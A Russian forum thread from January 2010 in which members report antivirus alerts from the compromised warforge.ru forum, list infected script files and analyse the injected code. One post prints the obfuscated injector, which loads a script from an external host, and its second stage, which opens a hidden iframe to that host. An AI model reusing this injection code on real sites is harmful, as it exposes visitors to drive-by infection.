Троян на форуме?

[Ызарг]

Я гарантирую это. Только что вылез в темпе, Exploit.DirectShow по классификации Др.Веба, файл тот же - win[1].jpg. Зиба, преврати этот вин в фейл :)

[da zIBiT]

Да, он вылез. Мой косяк. С этим НГ забыл одну процедуру произвести. Завтра почищу окончательно...

[frei]

он везде)

[Sir Lawrence Gentleshark]

Снова троян лезет-через пятнадцать скриптов одновременно. Нод ажно весь изошел.

[White Boy]

Опять троян. Опять тот же :) Trojan-Clicker.Frame.db

[Heymdall]

ESET Smart Security 4 определяет угрозу как JS/TrojanDownloader.Agent.NRL; находит его постоянно в /jscripts/*.js.

Самое интересное - вчера ничего не находил и не обновлялся, а сегодня не дает даже быстрым ответом пользоваться.

[P.A.S.H.K.A]

при загрузке любой страницы форума касперский выдает Trojan-Clicker.JS.Iframe.db.

[HG)Corsar]

Троянец всё активен, теперь уже и при перелистывании страниц форума, а не только в репе.

КИС2010 определяет его как Trojan-Clicker.JS.Iframe.db.

[OldWorld]

Атакует с форума разными троянами, Защитник Виндоус закрывает Эксплоер через каждые пару секунд%)

[Altom]

при загрузке любой страницы форума касперский выдает Trojan-Clicker.JS.Iframe.db.

Аналогично

[Костоглот]

и это не все

_http://forums.warforge.ru/jscripts/ips_wf_spoiler.js

_http://forums.warforge.ru/jscripts/ips_ipsclass.js

_http://forums.warforge.ru/jscripts/ipb_global.js

_http://forums.warforge.ru/jscripts/sns_toggle_visibility.js

_http://forums.warforge.ru/jscripts/ips_menu.js

_http://forums.warforge.ru/cache/lang_cache/ru/lang_javascript.js

_http://forums.warforge.ru/jscripts/ips_xmlhttprequest.js

_http://forums.warforge.ru/jscripts/ipb_global_xmlenhanced.js

_http://forums.warforge.ru/jscripts/dom-drag.js

_http://forums.warforge.ru/jscripts/ipb_forum.js

_http://forums.warforge.ru/style_images/1/folder_js_skin/ips_menu_html.js

_http://forums.warforge.ru/jscripts/ips_text_editor_lite.js

[%username%]

Вот тело вируса (в более-менее читаемом виде).

/*GNU GPL*/ 

try{

	window.xonload= function(){

		var Eubhbjfbm868vh = document.createElement('s)#)c!@#r#!i)))p^t($'.replace(/@|\^|\$|&|\!|#|\)|\(/ig, ''));

		var Onnr7trfzw697 = 'E6tt4chiq8m';

		Eubhbjfbm868vh.setAttribute('type', 't#$e#@&x&t$^@/&#j#(a^$&v!&^)a)s)c!)&r(()i(#p&@t@#'.replace(/\)|\(|&|@|\^|\$|#|\!/ig, ''));

		Eubhbjfbm868vh.setAttribute('src',  'h)(&$t#&t^#p!(^:#(/)/^)$@d!@i$((c^$(#t)$-#!^c(c#!@&.^#)#g&!&o^o())g@^@@l@^!&e#^$.#@^c#@o@!m&&^.!(!p(h&.^#a#!^))s)!g#)-&@t(()o@&^.)g(^u#$)i&!^d$!)(e$(#^b(#a(!$t@)).(^r^u@#$)8#0#8$0)@)/))t$#(e!^l$@e^@@g@(@&r#^a)!$)p^h).#)c@!!$o!.($u#k)$^(/)(@t$$e^#l)(e!!g&r)^@a()^#p)!h#!(.&$!#c@(#o@!^.#u$#k@@)!/(@m!&e@t&^r)^o@@l)@^y)!r(#@i@(c!@@@s($(.^&c!)!o@#(m)^/$g!o$@o$(!@!g(&$$l#)$e^!^$.@!^&c@(o$&!m@#@/)(m)@@)e@!$d#^i()a((@p(!l)(e!@$x^.)c^)@$o$)(m(&/@'.replace(/#|\!|\$|\^|@|&|\(|\)/ig, ''));

		Eubhbjfbm868vh.setAttribute('defer', 'd)&e@!^@f$@e$)#r@@^'.replace(/\^|\!|\)|\$|@|\(|&|#/ig, ''));

		Eubhbjfbm868vh.setAttribute('id', 'V)(!(i#c#!#u)&!)&1)((y##3)#^g)#k!!$(^n$^)g!^p))'.replace(/\(|#|\$|&|@|\)|\!|\^/ig, ''));

		document.body.appendChild(Eubhbjfbm868vh);

	}

} 

catch(Thq8rxlu5szo) {}

Все предельно очевидно. Речь идет о примитивно обфусцированном коде, создающем в документе новый элемент типа "script"

var Eubhbjfbm868vh = document.createElement('s)#)c!@#r#!i)))p^t($'.replace(/@|\^|\$|&|\!|#|\)|\(/ig, ''));

(спецсимволы ')', '#', '!', '@', '&', '^' в аргументе функции document.createElement удаляются при помощи replace'а). Далее этому элементу подобным же образом присваивается mime-тип 'text/javascript'. Самым важным является следующий этап - присваивание атрибуту src (источнику) этого скрипта значения http://dict-cc.google.com.ph.asg-to.guideb.../mediaplex.com/ Далее атрибуту 'defer' присваивается значение 'defer', дабы отложить исполнение скрипта до полной загрузки страницы. Атрибуту id присваивается значение 'Vicu1y3gkngp'. Затем этот элемент пристыковывается к документу. Вся эта конструкция находится внутри блока try-catch, дабы перехватывать исключения, могущие возникнуть при работе скрипта. Теперь, собственно, самое интересное - "вредоносный" код, расположенный по вышеуказанному адресу.

J3cht9hp = 'd)&i!)c^(t(!)-!$$@c!#©@.$&g#()@o!)o)&&g&@l!#e#.(&^c&&)#o)m^.##p^h(&!&.^^&!a)s&g!$-^@!!t@o(@)&.@!#g)!((!u$)&i@^^&d(#e(@)b@)a#!!#^t^.#!r(^u)$'.replace(/&|\)|\$|@|#|\!|\(|\^/ig, '');

f = document.createElement('iframe');

f.style.visibility = 'hidden';

f.src = 'http://'+J3cht9hp+':8080/index.php?js';

document.body.appendChild(f);

В ходе его исполнения на странице открывается скрытый iframe и загружает содержимое адреса http://dict-cc.google.com.ph.asg-to.guideb...80/index.php?js - в настоящее время пустую страницу.

В заголовках, отправляемых сервером, ничего подозрительного нет - обычный nginx+php.

Резюмирую. Какой-то пионер учится кросс-сайт-скриптингу. Правда, остается неясным, как это примитивное творение школьника, скучающего на каникулах, попало в javascript-библиотеки форума.

Upd. Судя по всему, на сервере форума установлена ОС FreeBSD. Если уважаемая администрация использует FTP-сервер из стандартной поставки (wu-ftpd), то возникает версия произошедшего, связанная с тем, что вышеозначенное решето позволяет простому пользователю получить рутовые права. Правда, для этого нужно иметь хотя бы права пользователя.

Upd. 2. Все, что было расположено по вышеуказанным адресам, удалено. "Злоумышленник", видимо, наигрался.

Upd. 3. По вышеприведенным ссылкам ходить исключительно на свой страх и риск! Злоумышленник разместил там неизвестное содержимое вредоносного характера. Что именно - я выясняю в настоящий момент.

Upd. 4. По ссылкам снова пусто. Какое-либо содержимое там появляется лишь на непродолжительное время. Получить то, для загрузки чего предназначен вышеописанный "троян", мне пока не удалось. Тем лучше - опасность заражения, судя по всему, минимальна.

Изменено 3 января, 2010 пользователем %username%

[Drinker]

Хм. У меня Касперский вообще ничего не выдавал. Сдох шоле? И таки я умру теперь? :rolleyes:

[Утка]

Хм. У меня Касперский вообще ничего не выдавал. Сдох шоле? И таки я умру теперь? :rolleyes:

аналогично :)

но у меня комп вроде еще жив

[%username%]

Вы, часом, не используете Noscript?

[Утка]

Вы, часом, не используете Noscript?

использую конечно

без него сейчас никак

[%username%]

Ну вот в этом и дело. Noscript блокирует подгрузку js-файлов, в данном случае зараженных. Так что тебе опасаться нечего.

[культурки не хватает?]

дело не в том, есть чего опасаться или нет, а в том когда это будет исправлено. и будет ли вообще.

[HG)Corsar]

К старому трояну (скрин1), сегодня добавился новый (скрин2). Новый троян сидит в репутации, антивирус блокирует любые действия связанные с изменением репы. Вчера и все предыдущие дни, с двух разных компов наблюдал только троян со скрина1.

Изменено 4 января, 2010 пользователем HG)Corsar

[Tarvitz]

Стоит последний Каспер. Орет почти на каждую страницу. Раз случайно сунулся на форум при отключенном антивирусе, Вирус не словил, но огнелис схлопнулся выдав крит ошибку.

[lamo]

Омг, у меня антивирус не обновлялся и молчал, получается я неделю беззаботно лазал среди вирусни оО. Хотя винда вроде не балует, тьфу тьфу. Виста сп1+опера9+писи-тулз фаервол.

[Inforser]

Ужасный ужас как у HG)Corsar.))

Все вернулось на круги своя.

[Mad_Rat]

И вновь продолжается бой...

Изменено 4 января, 2010 пользователем Mad_Rat

[Nakatan]

вот уже который день антивирус визжит как резанный, и впервые за все время его работы он полезен)))

репа не работает.

[eastprince]

Часть убита. Пишите, что ещё осталось.

Со страницы пытались запустить Java-дурь. У меня даже Comodo не орало. Не проверял, но видимо AdBlock убивал всё попытки что-либо открыть.